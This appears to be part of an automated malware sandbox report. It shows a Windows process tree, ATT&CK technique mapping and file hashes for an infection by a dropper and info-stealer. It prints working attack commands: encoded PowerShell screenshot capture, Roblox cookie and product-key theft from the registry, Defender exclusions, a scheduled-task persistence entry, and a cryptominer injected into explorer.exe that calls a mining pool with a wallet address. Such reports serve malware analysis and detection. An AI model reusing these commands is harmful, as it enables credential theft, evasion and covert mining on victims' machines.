C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath6⤵PID:5804
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="5⤵PID:2388
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5872 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kxrwcx4z\kxrwcx4z.cmdline"7⤵PID:4920
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82D7.tmp" "c:\Users\Admin\AppData\Local\Temp\kxrwcx4z\CSC43C355535A964C629B8F2016B0B11213.TMP"8⤵PID:5500
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5968
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:4020
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"5⤵PID:5428
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts6⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:1336 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5600
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:6040
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"5⤵PID:6080
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts6⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:6024 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5200
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5464
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:3972
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5576 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5604
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5360
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:5564
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:1248
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵PID:5064
-
C:\Windows\system32\getmac.exegetmac6⤵PID:5532
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:3248
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
- Command and Scripting Interpreter: PowerShell
PID:6032 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵PID:5916
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5836
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵PID:4384
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI36762\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\xTiN6.zip" *"5⤵PID:5920
-
C:\Users\Admin\AppData\Local\Temp\_MEI36762\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI36762\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\xTiN6.zip" *6⤵PID:4136
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵PID:860
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:2388
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵PID:5376
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵PID:4268
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5604
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵PID:2372
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:6096
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:2976
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵PID:476
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
- Command and Scripting Interpreter: PowerShell
PID:5048 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵PID:4180
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
PID:5124 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵PID:5680
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵PID:656
-
C:\Users\Admin\AppData\Local\Temp\splwow64.exe"C:\Users\Admin\AppData\Local\Temp\splwow64.exe"3⤵
- Executes dropped EXE
PID:4028 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\splwow64.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5676 -
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"5⤵PID:2032
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:5988 -
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\services64.exe"5⤵PID:4376
-
C:\Users\Admin\services64.exeC:\Users\Admin\services64.exe6⤵PID:3100
-
C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe"C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe"3⤵
- Executes dropped EXE
PID:4088
-
C:\Users\Admin\Desktop\munchenlatest.exe"C:\Users\Admin\Desktop\munchenlatest.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAbABxACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAdwB1ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAIABwAHIAbwBnAHIAYQBtACAAYwBhAG4AJwAnAHQAIABzAHQAYQByAHQAIABiAGUAYwBhAHUAcwBlACAATQBTAFYAQwBQADEANAAwAC4AZABsAGwAIABpAHMAIABtAGkAcwBzAGkAbgBnACAAZgByAG8AbQAgAHkAbwB1AHIAIABjAG8AbQBwAHUAdABlAHIALgAgAFQAcgB5ACAAcgBlAGkAbgBzAHQAYQBsAGwAaQBuAGcAIAB0AGgAZQAgAHAAcgBvAGcAcgBhAG0AIAB0AG8AIABmAGkAeAAgAHQAaABpAHMAIABwAHIAbwBiAGwAZQBtAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHQAYgBlACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAaABzACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4652 -
C:\Users\Admin\AppData\Local\Temp\rundii32.exe"C:\Users\Admin\AppData\Local\Temp\rundii32.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAbQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcwB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdgBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAcABjACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1432 -
C:\Users\Admin\AppData\Local\Temp\rundii.exe"C:\Users\Admin\AppData\Local\Temp\rundii.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Users\Admin\AppData\Local\Temp\rundii.exe"C:\Users\Admin\AppData\Local\Temp\rundii.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4624 -
C:\Users\Admin\AppData\Local\Temp\splwow64.exe"C:\Users\Admin\AppData\Local\Temp\splwow64.exe"3⤵
- Executes dropped EXE
PID:3024 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\splwow64.exe"4⤵PID:5192
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"5⤵PID:5612
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\services64.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:1516 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵PID:4776
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=83bM5DoDitniDg2ooQitzWKzapHhSvJmL8kn1dDcr4ST6wU8U6Cj7TN3FRXWJK3fDXNQBRf5TQ5qN2o1aCxi7vrxSi5T26L.ObamaNet --pass=johnlovesbbc --cpu-max-threads-hint=60 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=100 --tls --cinit-stealth5⤵PID:2728
-
C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe"C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe"3⤵
- Executes dropped EXE
PID:112
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
411KB
MD5180c04a828909e35bf3d461c0eb827cc
SHA1e692112d425fc5b6adc5c7bfa1e66757bb8f8c11
SHA256c7b5bccc8f1089f9ea3f5fb3a6dd2843bd27c2994a59d770fd4a81cc472e499b
SHA5126dda55954d148efad2615d26a85eebef3e3ab86de484a713b1c21e4c446b652aa8ccdc7a9c49e82110632019ad87a8365a418df2e0091bcc5235a1c0f240ea04
-
Filesize
79KB
MD579440f6d81fdf83469a8b3167f654461
SHA1f6cbbcaa10ff39668d44fc59f2bef06d192ddd95
SHA25648e1ca7b0e4554b35a0d965c1edb1b1fa152caaa6b68dd71df1029155e2d123f
SHA512ef3aee9569bbc047eb239121ee1783a1ed626570a157dba179124e8c68a1bad481be54c581427b8d7dc5fc058f0a6df9a4e9aa9ca2ee52d82378d823ddfe0af7
-
Filesize
95KB
MD5f34eb034aa4a9735218686590cba2e8b
SHA12bc20acdcb201676b77a66fa7ec6b53fa2644713
SHA2569d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
SHA512d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af
-
Filesize
58KB
MD531859b9a99a29127c4236968b87dbcbb
SHA129b4ee82aa026c10fe8a4f43b40cbd8ec7ea71e5
SHA256644712c3475be7f02c2493d75e6a831372d01243aca61aa8a1418f57e6d0b713
SHA512fec3ab9ce032e02c432d714de0d764aab83917129a5e6eeca21526b03176da68da08024d676bc0032200b2d2652e6d442ca2f1ef710a7408bd198995883a943a
-
Filesize
10KB
MD56746e9cbc897101fd8ca22e42490614f
SHA13d732b58411eb6f4ad624bc9c7c5243315466ed3
SHA25681310fd7aaf3a8a280e6efddecd5a682c871fc6f5595a3ba131c9e60b58c80e1
SHA5122d9e059c9f924030d119e42de65e7488dfb87459d732391c674448e63e3a10b75b0886e0eedfdcab86dbb14c987cf6d1a0d276a9bc7571fcb0cfd8ff0c9157d5
-
Filesize
10KB
MD550ccec6aa3033c421ec34a17625bdc08
SHA1abce26f3702e8f3d833f2e35adc8bc42d95354d6
SHA2560d9125cc84892ef961f33f316139e027095e325d540a98d5cd8099633d31b368
